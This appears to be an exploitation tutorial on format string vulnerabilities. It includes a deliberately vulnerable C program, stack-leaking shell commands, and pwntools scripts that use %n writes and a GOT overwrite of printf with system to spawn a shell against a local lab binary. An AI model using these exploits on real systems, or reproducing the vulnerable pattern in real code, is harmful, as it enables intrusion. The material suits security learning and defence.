Format String Vulnerabilities

Overview

A format string vulnerability occurs when user-controlled input is passed directly as the format argument to printf, fprintf, sprintf, or similar functions. Since format specifiers like %x, %s, and %n read from or write to the stack, an attacker can use them to leak memory contents or write arbitrary values to arbitrary addresses.

ATT&CK Mapping

  • Tactic: TA0002 - Execution
  • Technique: T1203 - Exploitation for Client Execution

Prerequisites

  • A binary where user input reaches a printf-family function as the format string (not as an argument to a format string)
  • GDB with pwndbg for debugging
  • pwntools for exploit scripting

Vulnerable vs Safe Code

// VULNERABLE — user input IS the format string
printf(user_input);
fprintf(stderr, user_input);
sprintf(buf, user_input);

// SAFE — user input is an argument, not the format string
printf("%s", user_input);
fprintf(stderr, "%s", user_input);
sprintf(buf, "%s", user_input);

Vulnerable Code Example

// fmtvuln.c — compile with: gcc -fno-stack-protector -no-pie -o fmtvuln fmtvuln.c
#include <stdio.h>

int main() {
    char buf[256];
    while (fgets(buf, sizeof(buf), stdin)) {
        printf(buf);     // format string vulnerability
    }
    return 0;
}

Format Specifiers for Exploitation

Specifier Action Exploit Use
%x Print 4 bytes from stack (hex) Leak stack values
%lx Print 8 bytes from stack (hex, 64-bit) Leak 64-bit addresses
%p Print pointer (same as 0x%lx) Leak addresses
%s Print string at address on stack Leak memory at pointer
%n Write number of bytes printed to address on stack Arbitrary write
%hn Write 2 bytes (short) Partial write
%hhn Write 1 byte (char) Byte-level write
%<N>$x Print Nth argument (direct parameter access) Target specific stack offset
%<N>$n Write to Nth argument address Write to specific offset

Reading Stack Values (Information Leak)

Sequential Leak

Each %lx consumes the next 8 bytes from the stack (on x86-64):

# Send to the vulnerable binary
echo 'AAAAAAAA.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx' | ./fmtvuln

Output:

AAAAAAAA.7fffffffdf80.0.0.4141414141414141.252e786c252e786c.786c252e786c252e...

The value 0x4141414141414141 is the AAAAAAAA from the input itself — this tells you where your input appears on the stack.

Direct Parameter Access

Use %N$lx to read specific stack positions without consuming intermediate values:

# Read the 6th argument from the stack
echo '%6$lx' | ./fmtvuln

# Read positions 1 through 20
for i in $(seq 1 20); do echo "%${i}\$p" | ./fmtvuln; done

Finding Your Input Offset

The offset where your input appears on the stack is critical for write exploits. Identify it by looking for 0x4141414141414141 in the output:

# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *

context.binary = './fmtvuln'

# Find the offset where our input appears on the stack
for i in range(1, 30):
    p = process('./fmtvuln')
    p.sendline(f'AAAAAAAA%{i}$lx'.encode())
    result = p.recvline()
    if b'4141414141414141' in result:
        log.success(f'Input at offset: {i}')
        break
    p.close()

Arbitrary Write with %n

The %n specifier writes the number of characters printed so far to the address pointed to by the corresponding argument. By placing a target address on the stack (in your input buffer) and using %n at the correct offset, you write to that address.

Writing a Small Value

To write the value 0x42 (66 decimal) to address 0x404060:

# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *

context.binary = './fmtvuln'

target_addr = 0x404060    # address to write to
write_value = 0x42        # value to write
input_offset = 6          # where our input appears on the stack

# Pad output to write_value bytes, then use %hhn to write 1 byte
payload  = p64(target_addr)
payload += f'%{write_value - 8}c%{input_offset}$hhn'.encode()

p = process('./fmtvuln')
p.sendline(payload)

pwntools fmtstr_payload

pwntools provides fmtstr_payload() to automate format string writes:

# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *

context.binary = elf = ELF('./fmtvuln')

# Offset where input appears on the stack
input_offset = 6

# Write a value to an address
# fmtstr_payload(offset, {addr: value})
payload = fmtstr_payload(input_offset, {elf.got['printf']: elf.symbols['system']})

p = process('./fmtvuln')
p.sendline(payload)
p.sendline(b'/bin/sh')    # next printf call now calls system("/bin/sh")
p.interactive()

fmtstr_payload parameters: - First argument: the stack offset where input appears - Second argument: dictionary of {address: value} pairs to write

GOT Overwrite via Format String

The Global Offset Table (GOT) maps library function names to their runtime addresses. On binaries with Partial RELRO, the GOT is writable. Overwriting a GOT entry redirects future calls to that function.

Common targets:

Overwrite With Effect
printf@GOT system Next printf(input) becomes system(input)
puts@GOT system Next puts(input) becomes system(input)
exit@GOT main Prevents exit, loops back for more writes
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *

context.binary = elf = ELF('./fmtvuln')

# Overwrite printf GOT entry with system
payload = fmtstr_payload(6, {elf.got['printf']: elf.symbols['system']})

p = process('./fmtvuln')
p.sendline(payload)

# Now printf calls system — send a command
p.sendline(b'/bin/sh')
p.interactive()

This only works with: - Partial RELRO (GOT is writable) - No PIE (GOT address is known) — or PIE with a leaked binary base

Debugging Format Strings

# GDB
# https://www.gnu.org/software/gdb/
gdb ./fmtvuln

# Break at printf
(gdb) break printf

# Run and send format string
(gdb) run <<< "AAAA%6$lx"

# When printf is hit, examine the stack
(gdb) x/20xg $rsp

# The format string arguments start at RSI (2nd arg), RDX (3rd),
# RCX (4th), R8 (5th), R9 (6th), then stack positions

References

Tools

MITRE ATT&CK